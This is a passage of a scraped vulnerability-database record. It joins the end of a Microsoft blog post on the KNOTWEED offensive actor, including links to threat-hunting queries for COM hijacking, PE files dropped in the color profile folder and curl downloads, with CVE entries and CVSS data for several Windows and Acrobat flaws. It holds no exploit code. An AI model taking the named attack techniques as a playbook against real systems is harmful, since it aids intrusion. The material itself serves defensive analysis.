tables:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-FileHashIOCsJuly2022.yaml>\n\n**Domain IOCs related to KNOTWEED**\n\nThis query identifies matches based on domain IOCs related to KNOTWEED against Microsoft Defender for Endpoint device network connections:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-DomainIOCsJuly2022.yaml>\n\n**COM registry key modified to point to Color Profile folder**\n\nThis query identifies modifications to COM registry keys to point to executable files in _C:\\Windows\\System32\\spool\\drivers\\color\\_:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-COMRegistryKeyModifiedtoPointtoColorProfileFolder.yaml>\n\n**PE file dropped in Color Profile folder**\n\nThis query looks for PE files being created in the _C:\\Windows\\System32\\spool\\drivers\\color\\ folder_:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-PEFileDroppedinColorProfileFolder.yaml>\n\n**Downloading new file using Curl**\n\nThis query looks for new files being downloaded using Curl.\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-DownloadingnewfileusingCurl.yaml>\n\nThe post [Untangling KNOTWEED: European private-sector offensive actor using 0-day exploits](<https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-27T14:00:00", "type": "mssecure", "title": "Untangling KNOTWEED: European private-sector offensive actor using 0-day exploits", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-36948", "CVE-2022-2204", "CVE-2022-22047"], "modified": "2022-07-27T14:00:00", "id": "MSSECURE:85647D37E79AFEF2BFF74B4682648C5E", "href": "https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2023-05-27T17:21:24", "description": "Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-31199.\n\n \n**Recent assessments:** \n \n**architect00** at June 09, 2021 6:55am UTC reported:\n\nThis vulnerability is abused in an exploitation chain. According to the Microsoft advisory it is abused with [Adobe Acrobat CVE-2021-28550](<https://attackerkb.com/topics/6EI6mBj0hQ/cve-2021-28550>).\n\n**gwillcox-r7** at June 17, 2021 4:19pm UTC reported:\n\nThis vulnerability is abused in an exploitation chain. According to the Microsoft advisory it is abused with [Adobe Acrobat CVE-2021-28550](<https://attackerkb.com/topics/6EI6mBj0hQ/cve-2021-28550>).\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "attackerkb", "title": "CVE-2021-31201", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201"], "modified": "2021-06-11T00:00:00", "id": "AKB:50EC30BE-5E8C-4158-8AA0-06397441F8A5", "href": "https://attackerkb.com/topics/DEo4rIL8JT/cve-2021-31201", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T17:21:23", "description": "Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-31201.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at June 17, 2021 4:20pm UTC reported:\n\nNot got much to contribute due to limited public information at this time but I did want to note that the `Confidentiality` and `Integrity` scores for this are oddly listed as `Low`, the `Availability` as `None`, and yet `Scope` is marked as `Changed`. My guess is that this is some sort of sandbox related escape given that if we were able to get higher permissions these scores would be a lot higher.\n\n**architect00** at June 09, 2021 6:57am UTC reported:\n\nNot got much to contribute due to limited public information at this time but I did want to note that the `Confidentiality` and `Integrity` scores for this are oddly listed as `Low`, the `Availability` as `None`, and yet `Scope` is marked as `Changed`. My guess is that this is some sort of sandbox related escape given that if we were able to get higher permissions these scores would be a lot higher.\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "attackerkb", "title": "CVE-2021-31199", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201"], "modified": "2021-06-16T00:00:00", "id": "AKB:DBAEA288-D224-49E1-877D-628DFD1CF161", "href": "https://attackerkb.com/topics/GmE7G3wbbK/cve-2021-31199", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:39:18", "description": "Acrobat Reader DC versions versions 2021.001.20150 (and earlier), 2020.001.30020 (and earlier) and 2017.011.30194 (and earlier) are affected by a Use After Free vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at June 04, 2021 5:25pm UTC reported:\n\nNo real details on this at the moment but according to Adobe\u2019s website at <https://helpx.adobe.com/security/products/acrobat/apsb21-29.html> this is a Use-After-Free bug in Adobe Acrobat that leads to remote code execution when opening a PDF. It was anonymously reported and has been reported to be exploited in the wild in limited targeted attacks against Windows users.\n\nGiven the available information though I would guess that to trigger this vulnerability a user would have to open a PDF containing malicious code in Adobe Acrobat and then the malicious PDF would run some JavaScript or similar to put memory into a stable state such that it would be able to trigger the UAF and gain control of Adobe Acrobat without crashing it.\n\nGiven Adobe Acrobat is popular though the attacker value for this bug is pretty high, though I did deduct a point if only cause an attacker would still need to convince a user to open the PDF. I also set the exploitability at medium as UAF bugs are not that easy to exploit, however web browsers and PDF readers often provide JavaScript engines that allow attackers to more easily control the state of memory, which can greatly ease the process of exploit development. However without knowing more info its difficult to gauge the level of exploitation difficulty for this specific exploit.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-05-11T00:00:00", "type": "attackerkb", "title": "CVE-2021-28550", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550"], "modified": "2021-09-16T00:00:00", "id": "AKB:132606CF-7B8C-4EE8-BE1C-308811E7B813", "href": "https://attackerkb.com/topics/6EI6mBj0hQ/cve-2021-28550", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-23T17:21:14", "description": "Windows Update Medic Service Elevation of Privilege Vulnerability\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-12T00:00:00", "type": "attackerkb", "title": "CVE-2021-36948", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36948"], "modified": "2021-08-21T00:00:00", "id": "AKB:D92D1688-7724-40C4-AD86-DF44F4611D40", "href": "https://attackerkb.com/topics/aTP6m1u6PE/cve-2021-36948", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-07T15:06:33", "description": "Windows Client Server Run-time Subsystem (CSRSS) Elevation of Privilege Vulnerability\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-05-17T00:00:00", "type": "attackerkb", "title": "CVE-2022-22047", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22047"], "modified": "2023-05-17T00:00:00", "id": "AKB:0B6E13D5-84E0-4D3E-BD21-781032FA30ED", "href": "https://attackerkb.com/topics/SzYymWZIy5/cve-2022-22047", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2023-05-27T14:46:55", "description": "Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-31199.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T07:00:00", "type": "mscve", "title": "Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201"], "modified": "2021-06-08T07:00:00", "id": "MS:CVE-2021-31201", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31201", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:46:55", "description": "Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-31201.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T07:00:00", "type": "mscve", "title": "Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201"], "modified": "2021-06-08T07:00:00", "id": "MS:CVE-2021-31199", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31199", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-23T16:35:54", "description": "Windows Update Medic Service Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T07:00:00", "type": "mscve", "title": "Windows Update Medic Service Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36948"], "modified": "2021-08-10T07:00:00", "id": "MS:CVE-2021-36948", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36948", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-07T15:19:20", "description": "Windows Client Server Run-time Subsystem (CSRSS) Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-12T07:00:00", "type": "mscve", "title": "Windows Client Server Run-time Subsystem (CSRSS) Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22047"], "modified": "2022-07-12T07:00:00", "id": "MS:CVE-2022-22047", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22047", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-05-27T14:42:15", "description": "Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-31201.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T23:15:00", "type": "cve", "title": "CVE-2021-31199", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31199", "CVE-2021-31201"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2"], "id": "CVE-2021-31199", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31199", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*"]}, {"lastseen": "2023-05-27T14:42:10", "description": "Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-31199.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T23:15:00", "type": "cve", "title": "CVE-2021-31201", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31199", "CVE-2021-31201"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2"], "id": "CVE-2021-31201", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31201", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*"]}, {"lastseen": "2023-05-27T14:35:39", "description": "Acrobat Reader DC versions versions 2021.001.20150 (and earlier), 2020.001.30020 (and earlier) and 2017.011.30194 (and earlier) are affected by a Use After Free vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-02T17:15:00", "type": "cve", "title": "CVE-2021-28550", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550"], "modified": "2021-09-15T13:55:00", "cpe": ["cpe:/a:adobe:acrobat_reader:17.011.30194", "cpe:/a:adobe:acrobat:20.001.30020", "cpe:/a:adobe:acrobat_reader:20.001.30020", "cpe:/a:adobe:acrobat_reader_dc:21.001.20150", "cpe:/a:adobe:acrobat_dc:21.001.20150", "cpe:/a:adobe:acrobat:17.011.30194"], "id": "CVE-2021-28550", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28550", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:adobe:acrobat_reader:17.011.30194:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat:17.011.30194:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:20.001.30020:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:21.001.20150:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat:20.001.30020:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader_dc:21.001.20150:*:*:*:continuous:*:*:*"]}, {"lastseen": "2023-05-23T15:35:39", "description": "Windows Update Medic Service Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-12T18:15:00", "type": "cve", "title": "CVE-2021-36948", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36948"], "modified": "2021-08-20T18:58:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2016:2004"], "id": "CVE-2021-36948", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-36948", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", 